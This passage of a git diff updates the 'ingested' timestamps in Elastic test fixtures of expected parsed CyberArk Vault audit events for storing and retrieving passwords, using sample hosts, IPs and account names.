Value=\\\"WindowsDesktopLocalAccountsRotationalPolicy\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"InProcess\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" 
Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1615722505\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CurrInd\\\" Value=\\\"2\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 04:48:26\",\"IsoTimestamp\":\"2021-03-14T11:48:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Groups\\\\WindowsGroup\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WindowsDesktopLocalAccountsRotationalPolicy\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615722505\"},{\"Name\":\"CurrInd\",\"Value\":\"2\"}]}}}}", "code": "294", "kind": "event" 
@@ -620,7 +638,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-12-09T13:36:44.612805300Z", + "ingested": "2021-12-14T14:42:09.706889414Z", "original": "\u003c5\u003e1 2021-03-15T10:12:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:12:21\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:12:21Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e294\u003c/MessageID\u003e\\n \u003cDesc\u003eStore password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eStore password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eTest\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDesktopLocal\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"x_accountA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"components\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"ResetImmediately\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"InProcess\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"27\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"StartChangeNotBefore\\\" Value=\\\"1615754905\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"GroupName\\\" Value=\\\"WindowsGroup\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1615231204\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Index\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DualAccountStatus\\\" Value=\\\"Inactive\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"VirtualUsername\\\" Value=\\\"virtual\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:12:21\",\"IsoTimestamp\":\"2021-03-15T10:12:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating 
System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"SequenceID\",\"Value\":\"27\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"StartChangeNotBefore\",\"Value\":\"1615754905\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615231204\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "294", "kind": "event" 
@@ -703,7 +721,7 @@ "event": { "severity": 2, "action": "store password", - "ingested": "2021-12-09T13:36:44.612810100Z", + "ingested": "2021-12-14T14:42:09.706889802Z", "original": "\u003c5\u003e1 2021-03-15T13:13:01Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:13:01\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:13:01Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e294\u003c/MessageID\u003e\\n \u003cDesc\u003eStore password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eStore password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eStore password\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" 
Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615813465\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:13:01\",\"IsoTimestamp\":\"2021-03-15T13:13:01Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"294\",\"Desc\":\"Store password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Store password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Store 
password\",\"GatewayStation\":\"10.0.1.20\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615813465\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "294", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-295-retrieve-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-295-retrieve-password.log-expected.json index b470772f336..34b98e708ab 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-295-retrieve-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-295-retrieve-password.log-expected.json 
@@ -68,7 +68,7 @@ "event": { "severity": 2, "reason": "AIM password request", - "ingested": "2021-12-09T13:36:45.560089Z", + "ingested": "2021-12-14T14:42:10.855172542Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e295\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eProv_PVWA\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.3\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eAIM password request\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"admin2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"No Reason\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" 
Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"Nobody\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"295\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Prov_PVWA\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\",\"Station\":\"10.2.0.3\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"AIM password request\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"admin2\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"CPMDisabled\",\"Value\":\"No Reason\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Customer\",\"Value\":\"Nobody\"}]}}}}", "code": "295", "kind": "event", 
@@ -168,7 +168,7 @@ "event": { "severity": 2, "reason": "(Action: Show Password)", - "ingested": "2021-12-09T13:36:45.560097600Z", + "ingested": "2021-12-14T14:42:10.855175168Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e295\u003c/MessageID\u003e\\n \u003cDesc\u003eRetrieve password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eadm2\u003c/Issuer\u003e\\n \u003cAction\u003eRetrieve password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eWindows\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.6\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e(Action: Show Password)\u003c/Reason\u003e\\n \u003cPvwaDetails\u003e\u003cRetrieveReason\u003e\\n \u003cGeneral\u003e\\n \u003cRetrieveAction\u003eShow Password\u003c/RetrieveAction\u003e\\n \u003c/General\u003e\\n\u003c/RetrieveReason\u003e\u003c/PvwaDetails\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eRetrieve password\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.2.0.3\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WIN-SERVER-LOCAL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"Administrator2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"dbserver.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"DBServer\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessReconciliation\\\" Value=\\\"1604944215\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"EvilCorp\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"295\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"adm2\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Windows\",\"File\":\"Root\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\",\"Station\":\"10.2.0.6\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"(Action: Show Password)\",\"PvwaDetails\":{\"RetrieveReason\":{\"General\":{\"RetrieveAction\":\"Show Password\"}}},\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"10.2.0.3\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WIN-SERVER-LOCAL\"},{\"Name\":\"UserName\",\"Value\":\"Administrator2\"},{\"Name\":\"Address\",\"Value\":\"dbserver.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating 
System\"},{\"Name\":\"LogonDomain\",\"Value\":\"DBServer\"},{\"Name\":\"SequenceID\",\"Value\":\"1\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessReconciliation\",\"Value\":\"1604944215\"},{\"Name\":\"Customer\",\"Value\":\"EvilCorp\"}]}}}}", "code": "295", "kind": "event", @@ -262,7 +262,7 @@ "event": { "severity": 2, "reason": "testing", - "ingested": "2021-12-09T13:36:45.560103300Z", + "ingested": "2021-12-14T14:42:10.855175610Z", "original": "\u003c5\u003e1 2021-03-08T18:16:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:16:51\",\"IsoTimestamp\":\"2021-03-08T18:16:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\testobject\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"testing\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"test\"},{\"Name\":\"Address\",\"Value\":\"test\"},{\"Name\":\"CPMDisabled\",\"Value\":\"testing\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "295", "kind": "event", 
@@ -368,7 +368,7 @@ "event": { "severity": 2, "reason": "CPM", - "ingested": "2021-12-09T13:36:45.560112Z", + "ingested": "2021-12-14T14:42:10.855176015Z", "original": "\u003c5\u003e1 2021-03-08T19:19:59Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 11:19:59\",\"IsoTimestamp\":\"2021-03-08T19:19:59Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"CPM\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDesktopLocal\"},{\"Name\":\"UserName\",\"Value\":\"x_accountA\"},{\"Name\":\"Address\",\"Value\":\"components\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ChangeTask\"},{\"Name\":\"InProcess\",\"Value\":\"ChangeTask\"},{\"Name\":\"SequenceID\",\"Value\":\"26\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"StartChangeNotBefore\",\"Value\":\"1615231182\"},{\"Name\":\"GroupName\",\"Value\":\"WindowsGroup\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1614785704\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"Index\",\"Value\":\"1\"},{\"Name\":\"DualAccountStatus\",\"Value\":\"Inactive\"},{\"Name\":\"VirtualUsername\",\"Value\":\"virtual\"}]}}}}", "code": "295", "kind": "event", 
@@ -454,7 +454,7 @@ "event": { "severity": 2, "reason": "CPM", - "ingested": "2021-12-09T13:36:45.560117600Z", + "ingested": "2021-12-14T14:42:10.855176509Z", "original": "\u003c5\u003e1 2021-03-08T19:20:02Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 11:20:02\",\"IsoTimestamp\":\"2021-03-08T19:20:02Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Groups\\\\WindowsGroup\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"CPM\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WindowsDesktopLocalAccountsRotationalPolicy\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1615198782\"},{\"Name\":\"CurrInd\",\"Value\":\"2\"}]}}}}", "code": "295", "kind": "event", 
@@ -556,7 +556,7 @@ "event": { "severity": 2, "reason": "Application provider background refresh job", - "ingested": "2021-12-09T13:36:45.560123100Z", + "ingested": "2021-12-14T14:42:10.855176903Z", "original": "\u003c5\u003e1 2021-03-10T14:40:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 06:40:37\",\"IsoTimestamp\":\"2021-03-10T14:40:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"295\",\"Desc\":\"Retrieve password\",\"Severity\":\"Info\",\"Issuer\":\"Prov_COMPONENTS\",\"Action\":\"Retrieve password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"Application provider background refresh job\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve 